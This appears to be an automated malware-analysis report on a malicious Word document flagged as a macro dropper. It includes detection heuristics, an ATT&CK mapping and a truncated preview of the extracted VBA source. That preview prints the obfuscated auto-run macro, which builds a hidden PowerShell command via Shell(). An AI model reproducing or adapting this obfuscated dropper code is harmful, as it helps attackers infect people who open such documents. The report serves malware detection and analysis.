MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains VBA macros, specifically a Document_Open macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary commands, likely to download and run a secondary payload. The presence of a `powershell.exe` string within the obfuscated VBA script further suggests the use of PowerShell for execution.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6589471-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6589471-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16340 bytes |
SHA-256: d50a1a9b28159b735a6b19cb93acac353aea84d0903d36cc051d901766e18214 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "wFvpRXiJTDWtph" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function RLmhtzicNI() On Error Resume Next lmEbR = kHtaAv JULKjU = BCzMd - XQizJ / 36037 / WqacSU - 223327908 + Hex(CFTkj) * TTKud - Round(58201) aWBwjk = Sqr(14698) wXfBdJ = 38684 + isdAv + (70893 * CDbl(YJTJlb) - NvjYHR / CSng(38477) - OKdiG / Hex(OqbmuA) + 14400 - 90070) XlrCu = HDGXw AAmct = uiTVB - BLGMPC / 34101 / BCoZlQ - 223327908 + Hex(zwriTH) * CuwsR - Round(88123) VpIpO = Sqr(87807) SPUTt = 67596 + POBvjN + (62077 * CDbl(ADFkW) - zVlzYi / CSng(2841) - CviUL / Hex(rzAQL) + 71362 - 28881) QjvJuN = OctnwN WCYdV = TzAaiJ - irKot / 7217 / jWwIhF - 223327908 + Hex(kmikJ) * HbswQj - Round(55414) JcLSm = Sqr(5341) zMMrd = 58076 + lcmhiu + (17005 * CDbl(QWkXj) - VtPqDv / CSng(71619) - zvXuB / Hex(ijAoP) + 3683 - 59843) mzOjs = ZSSXZ MHLkd = pGYSQ - PiwRhb / 22064 / BzIhSs - 223327908 + Hex(UXoWw) * GwTzs - Round(97012) YHRDVT = Sqr(13057) ZfzGQv = 31004 + iKWpZ + (51721 * CDbl(DwLXN) - OuWibp / CSng(84431) - SUGKaJ / Hex(bmhVQS) + 62529 - 53833) RLmhtzicNI = UqOzDKtBw + VBA.Shell(LcdBTJqX + Chr(CltPVBE + vbKeyP + nBlia) + "owers" + wPVnoEFLH + HwJoulS + fbGdV + ilOrocl + ZEGWb + ULXijOzCMuz, 28251 - 28251) sPrzP = NtIzVu jRLsLJ = LlFwJK - TcrCz / 21793 / OOuMGz - 223327908 + Hex(UWaDj) * lKdsvZ - Round(59835) IDzJEM = Sqr(54959) dwPwd = 34239 + NUijvS + (54387 * CDbl(jfToc) - kmFJRj / CSng(59681) - LXSbp / Hex(HjUUaN) + 3112 - 46380) pIEPV = jUSCPR rlptwb = UHOrJG - HHLCl / 74584 / Lkawd - 223327908 + Hex(Iitvil) * zjWaKl - Round(58877) MpCMZV = Sqr(35939) SCRfFM = 68911 + OisZTf + (19189 * CDbl(zGYjrZ) - pzkFV / CSng(99918) - YoRLT / Hex(MMqMv) + 32664 - 51461) End Function Private Sub Document_open() On Error Resume Next FhZQW = huAWj GIOij = kYwON - bwwUt / 36830 / hpuiG - 223327908 + Hex(MDLPo) * oNVVii - Round(89132) irPMt = Sqr(85758) ffAOuT = 95595 + mNSNX + (58233 * CDbl(bllsA) - uGDAh / CSng(11941) - bntZu / Hex(wRjHf) + 83410 - 76346) iLtkt = iLGkX iQhXk = oOCsUH - YzRoi / 21528 / vTTTiU - 223327908 + Hex(jNjRu) * vRLKvK - Round(41509) mjcTt = Sqr(59195) tbKKL = 58181 + dWUZJ + (14650 * CDbl(YzGcT) - wIjWwJ / CSng(71783) - WBwbsS / Hex(NCKJAW) + 31772 - 77536) RLmhtzicNI wHHCJ = poSop VtzKwl = PPpKGc - OFnzXJ / 73285 / paDafp - 223327908 + Hex(IwrjzH) * KbIdA - Round(82859) jcttiC = Sqr(22614) hJKwNo = 32283 + FBVba + (29716 * CDbl(GmGtT) - iwMLRY / CSng(2242) - uuscLJ / Hex(HOzGtz) + 16373 - 91691) KzpJiN = FjfCIu tNwXvt = JftEb - qpijI / 86569 / XPoZL - 223327908 + Hex(vlFJzK) * bnaOr - Round(81195) frRts = Sqr(86282) YHYGH = 70485 + qSXiq + (92525 * CDbl(MquIvw) - cNQwbr / CSng(5779) - MjoMP / Hex(TkXtGW) + 37981 - 59355) End Sub Attribute VB_Name = "cONMSrYbpNk" Function wPVnoEFLH() On Error Resume Next MtAGXS = VESaw - rMjqTt / 41410 / CHNFT - 223327908 + Hex(iuwaV) * HEhij - Round(8363) ONajS = Sqr(44607) tUpcK = 57275 + ZOZtHo + (30294 * CDbl(vztoON) - NRKtIY / CSng(13977) - dHQbjp / Hex(DXdMGf) + 14868 - 97190) ujsMCd = cPQoa SzblIW = "HeLL " + " & ( $sHELlId" + "[1]+$ShEllI" + "D[13]+'X'" + ")( [St" + "RinG]::joiN" + "( '' ,([CHaR" + "[]] " + "(62 , 1" WiczQm = PSfGzV - NsdHl / 23303 / jCYPjv - 223327908 + Hex(sXGYa) * GilRj - Round(34226) jBwBV = Sqr(62844) BoJmm = 1522 + MmbGr + (8051 * CDbl(fmfwHP) - PCuUH / CSng(88676) - rdNOO / Hex(ETuvvi) + 99331 - 47383) GIHnFL = NBjkM cizwujvkGdm = "16, 1" + "09 ,84" + " ,119 ," + " 86,88" + " ,58," + "39, 58 , 11" + "6 ,127" TPpTf = GUBHMm - MtQVjk / 48897 / btNGYu - 223327908 + Hex(hjcSh) * sZQOnE - Round(51301) rtfzIk = Sqr(3906) imjDh = 64218 + PWuYiW + (8287 * CDbl(jGLaU) - OHmzNf / CSng(69469) - jELoG / Hex(Twhjwa) + 33632 - 14389) icQbCD = TISuj MvqUKKI = " ,109 " + ",55, 117,120" + ",112, 127 ," + "12" TdRNvT = bkATRc - zYURMF / 29202 / bjBmzW - 223327908 + Hex(FXDjaA) * BnHUaF - Round(39030) KPBKfP = ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.